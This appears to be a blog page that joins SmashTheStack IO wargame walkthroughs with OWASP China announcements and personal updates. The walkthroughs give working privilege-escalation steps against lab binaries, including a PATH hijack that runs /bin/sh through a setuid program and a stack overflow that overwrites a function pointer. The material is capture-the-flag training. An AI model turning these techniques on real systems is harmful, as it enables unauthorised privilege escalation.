onHacks

Honeynet 剛剛宣布了第四輪的鑑識分析挑戰, 而這次更有繁體中文和簡體中文支持! 這次主要是測試大家的 對 VOIP 的 鑑識能力. 還不去証明一下自己的能力?

這是給尤其在中國的每位網頁應用安全研究員的好消息,

OWASP 2010 中國峰會將在 10月 20至23日 在北京舉行. 我會在這博客為大家報上更多消息.

Welcome to level 4. In my opinion, this is easier than the previous levels if you have knowledge on how exectuables are being looked for in OS. You have been given both executable and source code again. When we first run the program, the following result is shown.

level4@io:/levels$ ./level4
uid=1004(level4) gid=1004(level4) euid=1005(level5) groups=1004(level4),1029(nosu)

Looks like it is running the command id.

The id command lists the real and effective user IDs and the group IDs of the user associated with the current process. This is the counterpart to the $UID, $EUID, and $GROUPS internal Bash variables. The id command shows the effective IDs only when they differ from the real ones. – From webtools.live2support.com

You can confirm it by looking at its source code. And yes, it does have a statement

system(“id”);

which call the Linux command.

If you are familiar with this command enough, actually it is just a piece of executable which is usually located at /bin/. But why you can run the command by just typing “id“, not “/bin/id“? It is because we have environment variable in our OS. In *nix system, it is PATH, you can use echo $PATH to see what is the current value of it.

level4@io:/levels$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/games

So what we are going to do at this level are:

1. Create a piece of code or script that call “/bin/sh“
2. Redirect the “id” command to run your script
3. Execute level4 executable

Why this works because the level4 executable has euid = level5, see definition of euid. If we bring up a shell from this executable, the shell will have level5 permission automatically. Amazing enough?

Actually you can only create code or scripts under /tmp/. We can do the following to create a script their.

level4@io:/levels$ mkdir /tmp/onhacks/
level4@io:/levels$ echo “/bin/sh” > /tmp/onhacks/id
level4@io:/levels$ chmod +x /tmp/onhacks/id

Next step is to change the environment variable by running:

level4@io:/levels$ PATH=/tmp/onhacks:/usr/bin:/bin:/usr/games

Now, you are ready to grant the access next level. Remember to grab the password for level 5. It reminds us to utilitze what you learn, even a little trick can break a big hole. Think creatively and diversely.

See you in level 5.

Note:

1. Other option: You can replace the script with a piece of C code which execute execl(“/bin/sh”);
2. Your changes on environment variable will not affect others, it is scoped in the current session.

Hi all the heroes, you are now level 3 and it is time to fight with a little boss. This is time, the monster that blocking your way requires you to write some code (or script) to finish it. Different from previous two level, this time you can have the executable and source code. As usual, first we execute the program without parameter:

level3@io:~$ /levels/level03
Segmentation fault

Crap! I hate seeing segmentation fault, how about giving it a parameter?

level3@io:~$ /levels/level03 nosegmentationfault
Address of hmm: 0x804847f

The executable gives us a hint that hmm is the key at this level. Let’s attach gdb and see what is inside the program.

(gdb) disass hmm
Dump of assembler code for function hmm:
…
0x080484a8 <hmm+41>:    call   0×8048340 <execl@plt>

I guess we are looking at the right place, hmm is a function which execl “something”. By looking at the source code, we can confirm that the function is what we need. The remaining part to grant access is to use stack buffer overflow. How can we achieve it? Go back to the source code, there is an interesting thing.

int (*fptr)(int) = good;
…
(*fptr)((int)hmmptr);

The program is using an unusual way to execute function good, we can take advantage of it to call hmm() by rewriting the value in *fptr. Can we do this? We need to look at how the stack buffer looks like.

As you can see, the variable that is being declared later will have a smaller address. In other words, we can overwrite the values in *fptr by specifying more than 32 bytes to buf. Let’s go back to gdb and see when *fptr is being used to call.

(gdb) disass main
…
0x0804859f <main+240>:  mov    eax,DWORD PTR [ebp-0x14]
0x080485a2 <main+243>:  call   eax
…

The function is being called at 0x080485a2. Then how is the buffer looks like at that time?

(gdb) break *0x080485a2
Breakpoint 1 at 0x80485a2
(gdb) run $(perl -e ‘print “B”x40′;)
(gdb) x/20x $esp
0xbfffdcc0:     0x0804847f      0×00000000      0×00000030      0×00000000
0xbfffdcd0:     0×00000000      0×00000000      0xbfffde8d      0x0804847f
0xbfffdce0:     0×41414141      0×41414141      0×41414141      0×41414141
0xbfffdcf0:     0×41414141      0×41414141      0×41414141      0×41414141
0xbfffdd00:     0×41414141      0×42424242      0×00000000      0×00000029

According to the graph above, *fptr is located at 0xbffdd00. From the memory dump above, the first half of the variable is being replaced by 4 “A”. But actually the last 4 bytes in *fptr is already good enough because address are 4 bytes long in 32-bit machines. So what you need is constructing a string with 40 characters long, which fits into variable buf, the last 4 bytes are storing the address of hmm(). Keep in mind that the address is being stored differently in memory (It is Big-Endian).

You can create the parameter like this:

./level3 `perl -e ‘print “B”x36′; printf <Address of hmm() in Big-Endian representation>`

Ready to go to level 4? See you then.

How do you feel about breaking the program in level 1? Do you think that you can be a hacker? Sure you can. What you need is getting familiar with tools (weapons) that you have, and always be evil. gdb is always one of the great tool for investigation. But we usually don’t use it to discover vulnerabilities in a software because usually software has thousands or millions line of code which makes it not very possible that you can find a hole with your eye, no matter you are shortsighted or not.

Anyway, let’s move one to the next stage. After finishing the little thing at level1, we have a bigger thing waiting at level2 (not even a boss yet). When you first execute the program with no parameters, you will have this:

Append the 39th through 42nd numbers in the sequence as a string and feed it to this binary via argv[1]. 1, 2, 3, 5, 8, 13, 21…
The 4th through the 7th numbers would give you 581321

Easy enough? This time, you don’t really need to break the program, you just need to find what it wants and pass it as a string. Obviously, this is a Fibonacci Sequence and in this case, the 45th number (1836311903) is still fit within 2³¹-1. So, you can just write a simple program to generate the sequence then print the 39th through 42nd numbers. Or if you don’t want to write a program, any spreadsheet software should be able to help you calculate the sequence.

Not much I can tell you this time. What you can learn here is, try tackle a problem in different ways, and get familiar with what you have. See you in level 3!

Let’s begin our wargame from SmashTheStack IO level 1. In my opinion, this game is a good practice to get familiar with gdb, the widely used debugger in *nix system. Okay, so first of all, you need a way to ssh to the domain io.smashthestack.org at port 2224 with this credential: level1@level1. This is the entrance point as stated in this page: http://io.smashthestack.org:84/

The level 1 program should be located at /levels/level01. When you first execute this program w/o any parameters, it will provide you its help:

Usage: ./level01 <password>

If you type something like ./level01 password, result could be: Fail.

Let’s attach the gdb and see what is interesting in its main program.

level1@io:/levels$ gdb ./level01
(gdb) disass main
…
0x0804846c <main+120>:  call   0x804830c <strncmp@plt>
0×08048471 <main+125>:  test   %eax,%eax
0×08048473 <main+127>:  jne    0x804849f <main+171>
…
0×08048498 <main+164>:  call   0x80482ec <execl@plt>
…
0x080484be <main+202>:  ret

You will soon discover this line

0x0804846c <main+120>:  call   0x804830c <strncmp@plt>

is where we are interested in. Few lines from this statement, there is a execl call, it seems that the strncmp is being used in an if statement. So we can set a break point at 0x0804846c and see what are they comparing.

(gdb) break *0x0804846c
(gdb) run password
(gdb) i r
eax            0x80485c8        134514120
ecx            0xbfffdebd       -1073750339
…

If you try to get value at the address stored in each register, you will get the password which leads you to next level, because one of the register is pointing to the expected string that will execute the execl statement, and another one is your input. What you need to do is to run level1 program again with the right input, then you will have access to level2 and you can retrieve the password to login as level2 by looking at /home/level2/.pass.

I am not going to tell you the actual input for level1, you are just a step away from the goal after reading my logs above. Assuming you are new to gdb, what you can learn here are:

1. How to attach a debugger (gdb) to a program?
   Ans. gdb <executable path> or gdb -q <executable path>
2. How to disassemble a function in an executable?
   Ans. disass <function name>
3. How to set break point in an executable?
   Ans. break <instruction address>
4. How to run a program in gdb with parameter?
   Ans. run [<parameter>]
5. How to dump the current values of registers?
   Ans. info registers (“i r” in short)
6. How to look at the value of an address stored in a register?
   Ans. You need to figure this out.

I am moving on to next level, how about you?

Hope you enjoy playing this IO wargame.

After disappearing for quite a long time, I am trying to continue writing something which can also prove that I am still alive. Few updates around me.

1. I just moved from Richmond, BC to Redmond, WA. Working with my team more closely.
2. Helping my team to start up a new project for customers who want to rebrand our product as a service.
3. Started playing wargames (in security).

Yes! I am playing security wargame in SmashTheStack. The main goal is to use the program you can run in the current level to gain access to the advance level, there is always a vulnerability in the programs. It has many different types of games, depending on what vulnerability the programs have, or how you are going to break them. eg. IO, Logic, Blackbox.

I just started playing with the IO games, while all the programs I broke so far is depending on the input you gave. Usually, they have stack buffer overflow or heap buffer overflow issues.

Why I am presenting this post with subject “SmashTheStack series”? Because I would like to present the solutions (or hints) of the levels that I already solved. In the next few months, I will focus on breaking the programs there. Until I have any bright idea on a security topic that I would like to work on or share. BTW, this game is good for you to play with during leisure time.

OWASP 測試指南 V3 中文版 終於公開了！可以在 OWASP 中國主頁下載。強力推薦有興趣於網頁安全研究的人去看看這份指南，肯定會有所收穫。

OWASP中國研究小組

為了更好的促進OWASP中國各區域的沙龍、活動能夠持續、穩定的進行，OWASP中國特成立的各區域小組，主要為了促進小範圍內的交流和分享。同 時，也非常歡迎大家自薦成為自己所在區域的負責人。OWASP中國項目研究組以目前OWASP的開源項目為基礎，深入研究各類應用安全技術，並輸出相關中 文資料、培訓文檔、安全工具等。同時，也會不定期的在各區域的活動上做相關培訓。 OWASP中國QQ交流群 78238096

我希望能出一分力提高中國互聯網的安全，从 Frank Fan 及 RIP 那边接手了项目，所以之前十二月就是為了把這個完成，花費了相當多時間。

非常感謝以下的人，尤其 Microsoft 內的大家在聖誕節加班的大力技持！姓氏排名：

• Aaron (DBAPPSECURITY)
• 程琼(Microsoft)
• Frank Fan (DBAPPSECURITY)
• 贺佳琳(Microsoft)
• 李伟荣(Microsoft)
• RIP (OWASP China Chair)
• 沈巍(Microsoft)
• 王超(Microsoft)
• 韦炜(Microsoft)
• 张柏明(Microsoft)
• 趙嘉言(Microsoft)

希望大家都有所獲益！

Hi guys this is Log0, not that I’m dead, but I’m very well alive.

For the whole December and some January, I’ve been working for OWASP China on some projects – thus taking my full attention. And I have been busy on picking up some bits of life and my side project – yes! Working on it! It’s coming in this January!

The 2009 is a fantastic year! I am aiming well for 2010 and will aim to advance fully into my interests. More to that next time… meanwhile, stay tooned. =)

Brief note…

You might have noticed that I used md5 as filenames in the previous (old!) post. In most cases, it is fine.

However, what if the malware depends on a file called hgz.dll? You can calculate hgz.dll as md5, then find the filename out, now put that in the VM again – fine. But you see it is a troublesome process… that you can’t easily automate. There are other cases… of course.

Well, you get the point!